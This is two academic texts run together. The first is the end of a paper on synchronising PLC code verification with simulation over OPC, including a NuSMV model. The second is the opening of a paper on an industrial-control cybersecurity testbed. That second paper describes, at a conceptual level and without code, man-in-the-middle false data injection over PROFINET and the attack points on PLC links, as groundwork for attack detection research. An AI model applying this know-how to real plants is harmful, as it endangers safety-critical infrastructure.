As shown in this paper, the proposed synchronization mechanism based on IEC 61131-3 fulfils the requirements for performing reliable PLC code verification. However, a more industrially attractive solution would be to embed a synchronization mechanism into the PLC and the simulation tool. To achieve industrial acceptance, a solution based on an already accepted standard, such as OPC, is preferable. The OPC Foundation, PLC vendors and CAPE tool vendors could together agree on an extension to the OPC standard and a simulation mode in the PLCs that would make it possible to fulfil the requirements for reliable simulation. The authors have identified the following requirements as important for a new standard:
- compatibility with existing simulation tools and PLC solutions;
- a synchronization mechanism to guarantee a reliable simulation and deterministic results, as described in Sections IV and V;
- synchronized common start, stop and reset functionality for simulation and PLC;
- vendor independence.

VIII. CONCLUSION

OPC is today established as a de facto standard for connecting PLCs to CAPE tools for verification purposes, but in this paper four major issues of concern regarding its usage are presented and described in detail, namely jitter, time delay, race condition, and slow sampling. Each of these four issues will indeed result in unreliable results and hazardous effects, as shown in the case study, e.g., false collision detection, wrong sensor signals, etc. To overcome these issues, two different approaches have been presented in this paper.
1) A new time synchronization method based on IEC 61131-3 together with a simulation architecture. Such a method and architecture can be used for reliable verification and development of PLC code with CAPE tools. The proposed synchronization method, together with the architecture, has been demonstrated to work on PLCs that are compatible with the IEC 61131-3 standard. For industrial usefulness, the synchronization part can be automatically generated and attached for general IEC 61131-3 languages before the control logic is downloaded to the PLC.
2) An idea for an extension of the already existing OPC standard is also formulated.
Both approaches have been tested on real PLCs as well as soft PLCs with successful results. The concept has also been verified by a formal model, implemented in NuSMV [11]. The four issues associated with free-wheeling were solved with both of these synchronization methods. In a long-term perspective, a standardized OPC-based solution (2) is the most attractive one. A further advantage of the presented approach is that it does not conflict with the real-time capabilities of the target application.
Thus, it is possible to combine the proposed time synchronization method with existing PLC scan cycle time watchdogs (a check of whether specified real-time limits are exceeded). From an industrial point of view, a time synchronization method is necessary when verifying PLC control code. However, industrial state-of-the-art verification methods based on CAPE lack this type of feature. To be able to take the next step in the field of PLC code programming, verification and optimization with the aid of simulation tools, a general vendor-independent standard that deals with the issues identified in this paper is needed.

APPENDIX

The following section shows the NuSMV [11] model of the server-client concept described in Section IV. The formal verification based on this model shows, among other things, that the clients follow each other synchronously when the time delays are equal for each client, indicating that the concept works.

MODULE client (serverstate, previousserverstate, tv)
VAR
  state : {start, setup, ready, read, run, write};
  previous_state : {start, setup, ready, read, run, write};
  readysignal : {false, true};
  tdelay : 0..5;
ASSIGN
  init (state) := start;
  init (readysignal) := false;
  init (tdelay) := 0;
  next (state) := case
    serverstate = initial_write & tdelay = 0 : setup;
    serverstate = pre_read & tdelay = 0 : ready;
    serverstate = read & tdelay = 0 : read;
    serverstate = pre_write & tdelay = 0 : run;
    serverstate = write & tdelay = 0 : write;
    serverstate = pre_read & tdelay = 0 : ready;
    TRUE : state;
  esac;
  next (previous_state) := state;
  next (readysignal) := case
    state != previous_state : false;
    (readysignal = false & tdelay = 0) : {false, true};
    TRUE : readysignal;
  esac;
  next (tdelay) := case
    tdelay = 0 : {0..5};
    (previousserverstate = pre_read & serverstate = read) : tdelay - 1;
    TRUE : tdelay;
  esac;

MODULE server (sync)
VAR
  state : {start, initial_write, pre_read, read, pre_write, write};
  previous_state : {start, initial_write, pre_read, read, pre_write, write};
  tv : 0..1000;
ASSIGN
  init (state) := start;
  init (tv) := 0;
  next (state) := case
    (state = start) : initial_write;
    (sync & state = initial_write) : pre_read;
    (sync & state = pre_read) : read;
    (sync & state = read) : pre_write;
    (sync & state = pre_write) : write;
    (sync & state = write) : pre_read;
    TRUE : state;
  esac;
  next (previous_state) := state;
  next (tv) := case
    tv = 1000 : 0;
    (previous_state = pre_read & state = read) : tv + 1;
    TRUE : tv;
  esac;

MODULE main
VAR
  simulationserver : server((client1.readysignal = true | client1.tdelay != 0) & (client2.readysignal = true | client2.tdelay != 0));
  client1 : client (simulationserver.state, simulationserver.previous_state, simulationserver.tv);
  client2 : client (simulationserver.state, simulationserver.previous_state, simulationserver.tv);

Client 1 follows client 2, valid when the time delays for the different clients are equal:
SPEC AG (client1.state = client2.state)

Liveness test (no deadlock):
SPEC AG EF (simulationserver.state = write)

Specific order:
SPEC AG (simulationserver.state = read -> E [simulationserver.state = read U simulationserver.state = pre_write])

REFERENCES

[1] Y. Itoh, M. Fukagawa, T. Nagao, T. Mizuya, I. Miyazawa, and T. Sekiguchi, "Evaluation of execution time in programmable controller," in Proc. IEEE Symp. Emerging Technol. Factory Autom. (ETFA), 1999, pp. 1373-1379.
[2] J. Bathelt and J. Meile, "Computer aided methods supporting concurrent engineering when designing mechatronic systems controlled by a PLC," in Proc. ICMA '07, Singapore, 2007.
[3] M. Pellicciari, A. Andrisano, F. Leali, and A. Vergnano, "Engineering method for adaptive manufacturing systems design," Int. J. Interactive Design Manuf., vol. 3, pp. 81-91, 2009.
[4] K. Thramboulidis, "Model-integrated mechatronics: Toward a new paradigm in the development of manufacturing systems," IEEE Trans. Ind. Informat., vol. 1, no. 1, pp. 54-61, Feb. 2005.
[5] P. Hoffman, T. M. A. Maksoud, R. Schuman, and G. C. Premier, "Virtual commissioning of manufacturing systems: A review and new approaches for simplification," in Proc. 24th Eur. Conf. Modeling and Simulation, 2010.
[6] R. Drath, P. Weber, and N. Mauser, "An evolutionary approach for the industrial introduction of virtual commissioning," in Proc. IEEE Int. Conf. Emerging Technol. Factory Autom., 2008, pp. 5-8.
[7] D. Thapa, P. Chang Mok, S. Dangol, and W. Gi-Nam, "III-phase verification and validation of IEC standard programmable logic controller," in Proc. Int. Conf. Comput. Intell. Modeling, Control Autom. / Int. Conf. Intelligent Agents, Web Technol. Internet Commerce, 2006, pp. 111-111.
[8] G. Reinhart and G. Wünsch, "Economic application of virtual commissioning to mechatronic production systems," Prod. Eng., vol. 1, pp. 371-379, 2007.
[9] M. F. Zaeh, C. Poernbacher, and J. Milberg, "A model-based method to develop PLC software for machine tools," CIRP Ann. Manuf. Technol., vol. 54, pp. 371-374, 2005.
[10] R. Bernhardt, A. Sabov, and C. Willnow, "Virtual automation system standards," in Proc. IFAC Cost Oriented Autom., Gatineau/Ottawa, Canada, 2004, pp. 43-48.
[11] NuSMV, Jun. 10, 2011. [Online]. Available: http://nusmv.fbk.eu
[12] P. Klingstam and P. Gullander, "Overview of simulation tools for computer-aided production engineering," Comput. Ind., vol. 38, pp. 173-186, 1999.
[13] H. C. Ng, "An integrated design, simulation and programming environment for modular manufacturing machine systems," Mechatronics Research Group, Faculty of Computing Sciences and Engineering, De Montfort University, United Kingdom, 2003.
[14] S. Cho, "A distributed time-driven simulation method for enabling real-time manufacturing shop floor control," Comput. Ind. Eng., vol. 49, pp. 572-590, 2005.
[15] R. P. J. Q. Ma and R. Lipset, "Distributed manufacturing simulation environment," in Proc. Summer Computer Simulation Conf., 2001.
[16] S. C. Park, C. M. Park, G. N. Wang, J. Kwak, and S. Yeo, "PLCStudio: Simulation based PLC code verification," in Proc. Winter Simulation Conf., 2008, pp. 222-228.
[17] J. Ledin, Simulation Engineering: Build Better Embedded Systems Faster. Lawrence, KS: CMP Books, 2001.
[18] S. Kain, F. Schiller, and S. Dominka, "Reuse of models in the lifecycle of production plants: Using HiL simulation models for diagnosis," in Proc. IEEE Int. Symp. Ind. Electron., 2008, pp. 1802-1807.
[19] D. Maclay, "Simulation gets into the loop," IEE Review, vol. 43, pp. 109-112, 1997.
[20] E. Freund, A. Hypki, R. Bauer, and D. H. Pensky, "Real-time coupling of the 3D workcell simulation system COSIMIR," Bathurst, Australia, pp. 645-650, 2002.
[21] H. Schludermann, T. Kirchmair, and M. Vorderwinkler, "Soft-commissioning: Hardware-in-the-loop-based verification of controller software," in Proc. Winter Simulation Conf., Orlando, FL, 2000, vol. 1, pp. 893-899.
[22] R. Bernhardt, G. Schreck, and C. Willnow, "Realistic robot simulation," Comput. Control Eng. J., vol. 6, pp. 174-176, 1995.
[23] R. Bernhardt, G. Schreck, and C. Willnow, "The virtual robot controller interface," in ISATA Autom. Transp. Technol. Simulation and Virtual Reality, Dublin, Ireland, 2000.
[24] R. Bernhardt, G. Schreck, and C. Willnow, "Development of virtual robot controllers and future trends," in Proc. 6th IFAC Symp. Cost Oriented Autom., Berlin, Germany, 2001, pp. 209-214.
[25] M. H. Schwarz and J. Boercsoek, "A survey on OLE for process control (OPC)," in Proc. 7th Int. Conf. Appl. Comput. Sci., Venice, Italy, 2007, vol. 7, pp. 192-196.
[26] OPC Foundation. [Online]. Available: http://www.opcfoundation.org, 2010-10-01
[27] X. Hong and W. Jianhua, "Using standard components in automation industry: A study on OPC specification," Comput. Standards Interfaces, vol. 28, pp. 386-395, 2006.
[28] OPC Foundation, "Data Access Custom Interface Standard," ver. 3.00, 2003.
[29] MatrikonOPC, Oct. 1, 2010. [Online]. Available: www.matrikonopc.com
[30] F. Iwanitz, "XML-DA opens windows beyond the firewall," in Online Industrial Ethernet Book. Titchfield, Hampshire, U.K.: GGH Marketing Communications, 2004.
[31] S. Cavalieri and G. Cutuli, "Performance evaluation of OPC UA," in Proc. IEEE Conf. Emerging Technol. Factory Autom., 2010, pp. 1-8.
[32] W. Mahnke, S.-H. Leitner, and M. Damm, OPC Unified Architecture. Berlin, Germany: Springer, 2009.
[33] R. Kondor, "OPC, XML, .NET and real-time application," Matrikon Inc., 2007.
[34] PLCopen, Oct. 1, 2010. [Online]. Available: http://www.plcopen.org
[35] OMG, Oct. 1, 2010. [Online]. Available: http://www.omg.org
[36] Object Management Group (OMG), "Data acquisition from industrial systems specification," ver. 1.1, 2005.
[37] V. F. Wolfe, L. C. DiPippo, R. Ginis, M. Squadrito, S. Wohlevera, I. Zykh, and R. Johnston, "Real-time CORBA," Proc. Real-Time Technol. Appl., pp. 148-157, 1997.
[38] I. McGregor, "The relationship between simulation and emulation," in Proc. Winter Simulation Conf., San Diego, CA, 2002, pp. 1683-1688.
[39] CoDeSys, Oct. 1, 2010. [Online]. Available: http://www.3s-software.com
[40] Binar AB, Oct. 1, 2010. [Online]. Available: http://www.binar.se
[41] Integration Objects, Jul. 4, 2010. [Online]. Available: http://www.integ-objects.com
[42] F. Xiang, "Towards real-time enabled Microsoft Windows," in Proc. 5th ACM Int. Conf. Embedded Softw., 2005, pp. 142-146.
[43] F. M. Proctor and W. P. Shackleford, "Real-time operating system timing jitter and its impact on motor control," in Proc. SPIE Int. Soc. Opt. Eng., 2001, vol. 4563, pp. 10-16.
[44] B. Lincoln and A. Cervin, "Jitterbug: A tool for analysis of real-time control performance," in Proc. IEEE Conf. Decision Control, 2002, pp. 1319-1324.
[45] D. Chen, A. Mok, and M. Nixon, "Real-time support in COM," in Proc. 32nd Annu. Hawaii Int. Conf. Syst. Sci., 1999, p. 87.
[46] M. Fabian and A. Hellgren, "PLC-based implementation of supervisory control for discrete event systems," in Proc. IEEE Conf. Decision Control, 1998, vol. 3, pp. 3305-3310.
[47] F. Danielsson, "A distributed system architecture for optimizing control logic in complex manufacturing systems," in Proc. ISCA 12th Int. Conf., Atlanta, GA, 1999, pp. 163-167.
[48] B. Svensson, D. Danielsson, and B. Lennartson, "A virtual real-time model for control software development: Applied on a sheet-metal press line," in Proc. 3rd Int. Ind. Simulation Conf., Berlin, Germany, 2005, pp. 119-123.
[49] T. LeBaron and K. Thompson, "Emulation of a material delivery system," in Proc. Winter Simulation Conf., Part 2 (of 2), Washington, DC, 1998, pp. 1055-1060.
[50] Programmable Controllers, Part 3: Programming Languages, IEC 61131-3, 2003, 2nd ed.
[51] R. W. Lewis, Programming Industrial Control Systems Using IEC 1131-3, Revised edition. London: Institution of Electrical Engineers, 1998.
[52] A. Hellgren, M. Fabian, and B. Lennartson, "On the execution of sequential function charts," Control Engineering Practice, vol. 13, pp. 1283-1293, 2005.
[53] J. Proenza and S. Vitturi, "Guest editorial special section on industrial communication systems," IEEE Trans. Ind. Informat., vol. 6, no. 3, pp. 365-368, Aug. 2010.
[54] F. Benzi, G. S. Buja, and M. Felser, "Communication architectures for electrical drives," IEEE Trans. Ind. Informat., vol. 1, no. 1, pp. 47-53, Feb. 2005.
Henrik Carlsson was born in Falkenberg, Sweden, in 1979. He received the M.S. degree in robotics from University West, Trollhättan, Sweden, in 2005. Currently, he is working towards the Ph.D. degree at University West. He is working as a Simulation Expert at Volvo Cars Corporation, Gothenburg, Sweden. His main areas of interest include virtual commissioning, robot simulation, and PLM systems.
Bo Svensson was born in Mariestad, Sweden, in 1959. He received the M.S. degree in electrical engineering from Chalmers University of Technology, Gothenburg, Sweden, in 1984. Currently, he is working towards the Ph.D. degree in automation at Chalmers University of Technology, and received the Lic.Eng. degree in 2010. He was a Design Engineer with SAAB Space AB from 1984 to 1987. From 1987 to 1994, he was with SAAB Automobile AB as a System Engineer. Since 1994, he has been with the Department of Engineering Science, University West, Trollhättan, Sweden, as a Researcher. His main research interests include simulation-based optimization and virtual commissioning of complex manufacturing applications.
Fredrik Danielsson was born in Orust, Sweden, in 1972. He received the Ph.D. degree in mechatronics from De Montfort University, Leicester, U.K., in 2002. Since 2003, he has been the Head of the Robot Education at advanced level. Since 2004, he has been Head of the Automation Research Group at the Department of Engineering Science, University West. His main research interests include flexible automation, virtual commissioning, and robot systems.
Bengt Lennartson (M'10) was born in Gnosjö, Sweden, in 1956. He received the Ph.D. degree in automatic control from Chalmers University of Technology, Gothenburg, Sweden, in 1986. Since 1999, he has been a Professor of the Chair of Automation, Department of Signals and Systems. He was Dean of Education at Chalmers University of Technology from 2004 to 2007, and since 2005, he is a Guest Professor at University West, Trollhättan. He is (co)author of two books and 180 peer-reviewed international papers with 2200 citations (GS). His main areas of interest include discrete event and hybrid systems, especially for manufacturing applications, as well as robust feedback control.
Prof. Lennartson was the Chairman of the Ninth International Workshop on Discrete Event Systems, WODES'08, Associate Editor for Automatica, and currently he is a member of the Advisory Board for the IEEE TRANSACTIONS ON AUTOMATION SCIENCE AND ENGINEERING.
A_Cyber-Security_Methodology_for_a_Cyber-Physical_Industrial_Control_System_Testbed.pdf
Due to the recent increase in deployment of Cyber-Physical Industrial Control Systems in different critical infrastructures, addressing the cyber-security challenges of these systems is vital for assuring their reliability and secure operation in the presence of malicious cyber attacks. Towards this end, developing a testbed that generates real-time data-sets for critical infrastructure, to be used for the validation of real-time attack detection algorithms, is highly needed. This paper investigates and proposes the design and implementation of a cyber-physical industrial control system testbed where the Tennessee Eastman process is simulated in real-time on a PC and the closed-loop controllers are implemented on Siemens PLCs. False data injection cyber attacks are injected into the developed testbed through a man-in-the-middle structure where the malicious hackers can in real-time modify the sensor measurements that are sent to the PLCs. Furthermore, various cyber attack detection algorithms are developed and implemented in real-time on the testbed and their performance and capabilities are compared and evaluated.
Received January 6, 2021, accepted January 15, 2021, date of publication January 20, 2021, date of current version January 28, 2021.
Digital Object Identifier 10.1109/ACCESS.2021.3053135
A Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed
MOHAMMAD NOORIZADEH1, MOHAMMAD SHAKERPOUR2, NADER MESKIN1 (Senior Member, IEEE), DEVRIM UNAL2 (Senior Member, IEEE), AND KHASHAYAR KHORASANI3 (Member, IEEE)
1Department of Electrical Engineering, Qatar University, Doha, Qatar
2KINDI Center for Computing Research, Qatar University, Doha, Qatar
3Department of Electrical and Computer Engineering, Concordia University, Montreal, QC H3G 1M8, Canada
Corresponding author: Nader Meskin ([email protected])
This work was supported by the Qatar National Research Fund (a member of the Qatar Foundation) through the National Priorities Research Program (NPRP) under Grant 10-0105-17017. The work of Nader Meskin and Khashayar Khorasani was supported by the North Atlantic Treaty Organization (NATO) through the Emerging Security Challenges Division Program. The associate editor coordinating the review of this manuscript and approving it for publication was Wentao Fan.
INDEX TERMS Industrial control systems, cyber attack, attack detection algorithm, man-in-the-middle attack, hybrid testbed.
I. INTRODUCTION
Recent technological advances in control, computing, and communications have generated intense interest in the development of a new generation of highly interconnected and sensor-rich systems, known as critical Cyber-Physical Systems (CPS) infrastructure, with application to a variety of engineering domains such as process and automation systems, smart grids and smart cities, and healthcare systems. These complex systems are becoming more distributed and computer networked, which has necessitated the development of novel monitoring, diagnostics, and distributed control technologies. Supervisory Control And Data Acquisition (SCADA) systems, Wireless Sensor Networks (WSN), and PLCs are now established paradigms that are utilized in many critical CPS infrastructures.
On the other hand, the envisaged complex CPS infrastructure more than ever requires the development of novel and proactive security technologies, as these systems are continuously being targeted by cyber attacks and intrusions by intelligent malicious adversaries. The adversaries are capable of attacking core control systems that are employed in all key cyber-physical systems infrastructure. These scenarios are neither present in, nor similar to, the security challenges of traditional IT systems. Therefore, there exists an urgent need to study the vulnerabilities, analyze the risks, and develop defensive and mitigation mechanisms for critical CPS infrastructure.
Due to the sensitivity and high importance of safety-critical systems in real life, any research activity that is directly applied to the physical infrastructure can lead to disruption, unexpected damages or losses, and hence the development of testbeds that mimic the behavior of CPS in a small-scale fashion is highly essential for the development of various cyber-security technologies.
In this paper, a hybrid cyber-physical testbed for industrial control systems is developed and various types of real cyber attack scenarios are injected and implemented. Moreover, online real-time cyber attack detection algorithms are proposed to provide a comprehensive solution to the cyber-security of cyber-physical industrial control systems (ICS).
ICS testbeds generally consist of two main components, namely the physical process and the field devices such as PLC, HMI, RTU, etc. Depending on the implementation method, ICS testbeds are classified into three main categories as follows [1]: I) simulation testbeds, in which both components of the ICS are solely based on computer simulation [2]; II) physical testbeds, where real physical parts are used in both components [3]; and III) hybrid testbeds, in which a combination of simulation and physical testbed is considered, where some components of the testbed such as the physical process are simulated and the rest are based on actual physical parts [4], [5]. In this paper, the hybrid testbed architecture is selected for development of the ICS testbed, where the Tennessee Eastman (TE) plant is simulated inside a PC and the remaining parts are implemented using actual industrial hardware.
The TE plant is selected as the industrial process for our developed cyber-security testbed for the following reasons. First, the TE model is a well-known chemical process that is used in control systems research and its dynamics are well-understood. Second, it must be properly controlled, otherwise small disturbances will drive the system towards an unsafe and unstable operation. The inherent open-loop unstable property of the TE process presents a real-world scenario in which a cyber attack could correspond to a real risk to human safety, environmental safety, and economic viability. Third, the TE process is complex, coupled and highly nonlinear, and has many degrees of freedom by which to control and perturb the dynamics of the process. Finally, various simulations of the TE process have been developed with readily available, reusable code designed by Ricker [6].
From the anomaly detection perspective, cyber attack detection algorithms can be divided into five main categories, namely: linear, proximity-based, probabilistic, outlier ensembles, and neural network approaches [7]. Therefore, in order to have a comprehensive comparison of cyber attack detection approaches that fit the TE process, the following algorithms have been chosen from various categories: Principal Component Analysis (PCA), One-Class Support Vector Machines (OCSVM), Local Outlier Factor (LOF), k-Nearest-Neighbors (kNN), and Isolation Forest (IF). Comparative studies are conducted based on the cyber attack detection time and the confusion matrix performance metrics, where subsequently the OCSVM and kNN are demonstrated to yield promising performance for accomplishing the cyber attack detection objective.
A. BACKGROUND
Cyber attacks on TE processes are also investigated in the literature. In [8], an integrity attack is injected on the manipulated variable signals and the corresponding sensor measurements are analyzed by a correlation-based clustering algorithm. Different studies have been conducted on finding the optimal time to launch the Denial of Service (DoS) attack on either the sensor or actuator signals in the TE process [9]-[11].
Several cyber attack detection methods such as model-based approaches [12], [13], clustering-based approaches [14], Gaussian mixture models [15], and RNN-based approaches [16] are developed for detection of different cyber attacks on the TE process. However, all of the above work is based on the simulated TE process, and cyber attacks are mainly emulated inside the simulation file. Furthermore, several recent ICS testbeds for investigating cyber security are developed in the literature, and Table 1 presents comparisons among these testbeds for a diverse range of applications based on: TYPE (simulation (S), physical (P), real ICS (R), and hybrid (H)), Process, Data Type (network data (NET) and process data (PR)), Detection Method, Attacks, and Attack Type (emulation (E) and physical (P)).
TABLE 1. Overview of the existing testbeds for cyber-security study.
As shown in this table, in [17]-[25] cyber-physical testbeds are developed for the physical water system and different case studies in terms of data type, communication and attack injection/detection are presented. In [17], a model-based detection approach is developed to detect three different attacks by using network data. Also, a physics-based detection approach is presented in [18] in order to detect stealthy vulnerabilities by using the process data. In [19], an Intrusion Detection System (IDS) approach is developed to detect four various attacks by using network data. In [20], different data-driven intrusion detection algorithms are developed using the network data from the Modbus communication protocol. In [21]-[25], water system testbeds are developed based on Ethernet/IP as the communication protocol. A power system testbed is designed and implemented in [26]-[28]. A simulation testbed is used in [26], and in [27] a physical testbed is developed and different attack detection algorithms are developed by using both the network and the process data. In [29], [30], a simplified version of the Tennessee Eastman process is utilized as the physical plant in the testbed and model-based attack detection algorithms are proposed for the simulation-based testbeds without considering any physical hardware in the simulator.
B. CONTRIBUTIONS
In this paper, a full version of the nonlinear chemical process of the Tennessee Eastman process is used as the physical process in the developed hybrid testbed. Moreover, based on the structure and features of PROFINET as the industrial field bus that is used in the Siemens distributed I/O, an actual real-time false data injection cyber attack is implemented through the man-in-the-middle (MITM) architecture on the developed testbed. This is achieved by utilizing the Address Resolution Protocol such that the cyber hacker acts as the MITM in the closed-loop system and modifies the sensor measurements sent to the PLC or the actuator commands that are sent to the distributed I/O. Furthermore, various real-time online cyber attack detection algorithms are developed and implemented on the testbed and their performance capabilities are compared and evaluated. Consequently, this is the first work in the literature that completely simulates a full version of the Tennessee Eastman process using a hybrid testbed.
In other words, this work provides a comprehensive solution for the cyber-security of ICS with the following main contributions:
1) A hybrid testbed is developed by using the simulated full version of the Tennessee Eastman process as a nonlinear unstable process and the Siemens field devices such as PLC and distributed I/O, whereas the previous work in [29], [30] only considered the simplified version of TE without having any actual hardware in the testbed.
2) Real-time false data injection cyber attacks are implemented by compromising the PROFINET field-bus protocol for the first time in the literature, whereas, as shown in Table 1, all of the previous works are based on either the Modbus or the Ethernet communication protocols.
3) Several online cyber attack detection methodologies such as PCA, OCSVM, LOF, kNN, and IF are developed and implemented for real-time detection of cyber attacks in the supervisory level of the testbed. In contrast, in most of the previous work in the literature the detection algorithms are implemented off-line after collecting the data from the testbed.
The remainder of this paper is organized as follows. In Section II, the developed hybrid ICS testbed is presented. Section III provides details on the PROFINET field bus protocol that is used in the testbed, and in Section IV the implementation of the false data injection cyber attack is described and introduced. Section V presents the proposed cyber attack detection methodologies and in Section VI their performances are quantitatively demonstrated, validated, and verified subject to various cyber attack scenarios. Finally, in Section VII, conclusions and future work are provided.
II. HYBRID ICS TESTBED
The cyber-physical ICS includes three main components, namely, a physical plant to be controlled, an embedded system for implementing the controller, and a communication network for exchanging the information between the controller and the plant. In the developed testbed, these components are all considered, where the plant is simulated inside a PC, the controller is implemented on actual hardware (PLCs) and finally the communication is established by using the industrial protocol, namely, PROFINET.
As shown in Fig. 1, the developed testbed is partitioned into four layers: (1) the Tennessee Eastman plant that is simulated by a PC, (2) the field devices that are emulated by using DAQ and the Siemens distributed I/O, (3) the control layer implementation using the Siemens PLCs, and (4) the supervisory layer using an additional Siemens PLC and web-server. Moreover, the mathematical model of the TE process is implemented and simulated in the Matlab/Simulink environment and the controllers are implemented by using the PLCs. The interface between the plant simulation and the PLCs is accomplished by using the DAQ boards and the distributed I/O modules. The DAQ boards generate voltages that are proportional to various plant variables and also acquire the input voltages as the actuator command signals from the controller. Hence, by using the DAQs, different sensors and actuators inside the plant are emulated in the testbed. The distributed I/O modules provide the interface between the plant sensors/actuators and the PLCs. Consequently, the DAQ boards and the distributed I/O modules emulate layer 1 within the industrial automation hierarchy, namely the field layer.
FIGURE 1. The developed hybrid ICS testbed.
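The DAQ-based sensor/actuator emulation described above amounts to a linear mapping between a plant variable and an analog voltage. The following minimal Python sketch illustrates the idea only; it is not the authors' Simulink/DAQ code, and the engineering ranges and the 0-10 V span used below are hypothetical placeholders.

# Illustrative sketch (not the authors' code): linear scaling between an
# assumed engineering range of a plant variable and an assumed 0-10 V DAQ
# analog span, as used conceptually when a DAQ board emulates a transmitter.
def to_voltage(value, lo, hi, v_min=0.0, v_max=10.0):
    """Map a plant variable in [lo, hi] to a DAQ output voltage."""
    value = min(max(value, lo), hi)          # clamp to the engineering range
    return v_min + (value - lo) / (hi - lo) * (v_max - v_min)

def from_voltage(volts, lo, hi, v_min=0.0, v_max=10.0):
    """Map an actuator command voltage acquired by the DAQ back to engineering units."""
    return lo + (volts - v_min) / (v_max - v_min) * (hi - lo)

# Example: a reactor pressure of 2700 kPa on a hypothetical 0-3000 kPa range
print(to_voltage(2700.0, 0.0, 3000.0))   # -> 9.0 V sent to the distributed I/O
print(from_voltage(4.5, 0.0, 100.0))     # -> 45.0 % valve opening command

The same two mappings, applied in opposite directions, cover both paths in Fig. 1: plant variables out to the distributed I/O, and actuator voltages back into the Simulink model.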
A. TENNESSEE EASTMAN (TE) PROCESS SIMULATION
The TE process was first described by Downs and Vogel in 1993 [6], [31] and is modeled through fifty (50) nonlinear and coupled differential equations [32]. It consists of five major operational units, namely: (1) chemical reactor, (2) product condenser, (3) recycle compressor, (4) vapor-liquid separator, and (5) product stripper. Two liquid products (G, H) are produced by using A, C, D, and E gaseous reactants, with B and F as inert and byproduct, respectively. The chemical reactions are irreversible and can be presented as follows:
A(g) + C(g) + D(g) -> G(liq), Product 1
A(g) + C(g) + E(g) -> H(liq), Product 2
A(g) + E(g) -> F(liq), Byproduct
3 D(g) -> 2 F(liq), Byproduct
The TE process is a nonlinear, open-loop unstable process which reaches its shutdown constraints in less than 2 hours. Accordingly, a controller is required to maintain the system in the steady state and the process variables at desired values, and to enforce hard constraints on the process variables such as the reactor pressure, the reactor level, and the reactor temperature, among others [31], [33].
The TE process has 12 manipulated variables (XMVs), 41 measured variables (XMEAS), and 20 different process disturbances (IDVs) which can be chosen by the user [6]. The output measurements (XMEAS) of the plant are divided into 22 continuous-time and 19 discrete-time measurements. In the testbed developed in this work, only 9 inputs and 16 continuous-time outputs are used, as specified in Tables 2 and 3, respectively.
TABLE 2. Manipulated variables used in the testbed.
TABLE 3. Process measurements used in the testbed.
It should be noted that the time unit of the original TE process model is hours, which is not suitable for a real-time simulation. Thus, in order to make the process real-time, the model is modified accordingly by changing the state dynamics of the system and correspondingly the controller gains.
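One way to realize the rescaling described above is to divide every hour-based state derivative by 3600 so that the same equations can be integrated with t in seconds, after which the PI integral times are multiplied by 3600 (Section II-B). The sketch below is only an illustration of that idea under these assumptions, not the authors' exact Simulink implementation; the first-order lag stands in for the 50 coupled TE state equations.

# Minimal sketch, assuming the rescaling is implemented by dividing the
# hour-based derivatives by 3600; `toy_plant_hours` is only a stand-in
# for Ricker's TE model.
def toy_plant_hours(x, u, tau_h=0.5):
    # dx/dt with t in HOURS: first-order lag with a 0.5 h time constant
    return (u - x) / tau_h

def rescale_to_seconds(f_hours, scale=3600.0):
    # wrap an hour-based derivative so it can be integrated with t in seconds
    return lambda x, u: f_hours(x, u) / scale

f_sec = rescale_to_seconds(toy_plant_hours)

# crude forward-Euler check: after 1800 simulated seconds (= 0.5 h of model
# time) the rescaled state has covered ~63% of a unit step, as expected
x, dt = 0.0, 1.0
for _ in range(1800):
    x += dt * f_sec(x, 1.0)
print(round(x, 3))   # ~0.632

Consistently, a PI integral time of, say, 0.5 h in the original tuning of [31] becomes 0.5 * 3600 = 1800 s once the plant is integrated in seconds.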
As shown in Table 4, the closed-loop controller scheme for the testbed contains 9 main Proportional-Integral (PI) controllers on ve PLCs that are regulating the ow rate of each valve and the 8 internal PI loops for generating the internal set-points and variables that are needed in the main PI controllers. Accordingly, all the PI controllers' gains have been selected from the original paper in [31]. Subsequently, in order to convert the process to a real-time process in terms of process run time, all the Ti's gains are multiplied by 3600. The corresponding measurements and control inputs for each I/O module and the corresponding PLC are speci ed in Fig. 2. Moreover, as illustrated in this gure, XMEAS 17 and the production rate (FP as the internal variable in the PLC1) are also required by the other PLCs, which are implemented by using the Siemens S7 communication protocol. TABLE 4. Distribution of the TE control blocks in PLCs. C. SUPERVISORY LAYER As depicted in Fig 1, the supervisory layer that consists of the PLC 6 is the last layer of the TE testbed. Each Siemens S7-1200 contains internal memory that can be accessed FIGURE 2. The TE process block diagram. through a web-server. In other words, the web-server provides a local cloud that allows the user access and control over the PLC internal memory, stop/run PLC and many other features remotely (through the PLC static IP address). In the devel- oped testbed as shown in Fig 2, by using the Siemens internal communication protocol known as the S7 communication, all measurements and actuator data of each PLC are transferred to and are stored in the PLC 6 internal memory. Subsequently, these data can be downloaded from the web-server for train- ing or for online cyber attack detection purposes as will be presented and described in Section V. D. VULNERABILITIES AND CYBER ATTACK GATEWAYS AND POINTS Figure 2 illustrates the cyber attack gateways and points on the testbed where the malicious hackers can gain access to the communication link between the PLC and I/O modules. By accessing each communication link, the malicious hack- ers can inject different cyber attacks on the sensor mea- surements as well as actuator commands corresponding to that communication link. For example, as shown in Fig. 2 and Table 4, if the hacker accesses the communication link between the PLC1 and the I/O module 1 (labeled as commu- nication link #1), then the sensor measurements XMEASs 2, 3, 17 and 40 and the actuator commands XMVs 1 and 2 can be compromised. III. COMMUNICATION PROTOCOLS A. PROFINET Siemens S7-1200 utilizes the PROFINET protocol suite as an industrial Ethernet standard and S7-communication pro- tocol in order to communicate with other network nodes. PROFINET protocol is the standard protocol which is being facilitated heavily by Siemens as one of the main indus- trial Ethernet communication protocols. It has inherited its architecture from the native OSI model of TCP/IP for cyclic and acyclic data and UDP/IP for context manage- ment. A PROFINET architecture/system requires at least three nodes to operate, namely: the IO Controller (PLC), the IO Module (Sensor and Actuator), and the IO Supervisor VOLUME 9, 2021 16243 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed (Engineering Station or HMI Device). 
III. COMMUNICATION PROTOCOLS
A. PROFINET
The Siemens S7-1200 utilizes the PROFINET protocol suite as an industrial Ethernet standard and the S7-communication protocol in order to communicate with other network nodes. The PROFINET protocol is the standard protocol that is heavily promoted by Siemens as one of the main industrial Ethernet communication protocols. It has inherited its architecture from the native OSI model, using TCP/IP for cyclic and acyclic data and UDP/IP for context management. A PROFINET architecture/system requires at least three nodes to operate, namely: the IO Controller (PLC), the IO Module (sensor and actuator), and the IO Supervisor (engineering station or HMI device).
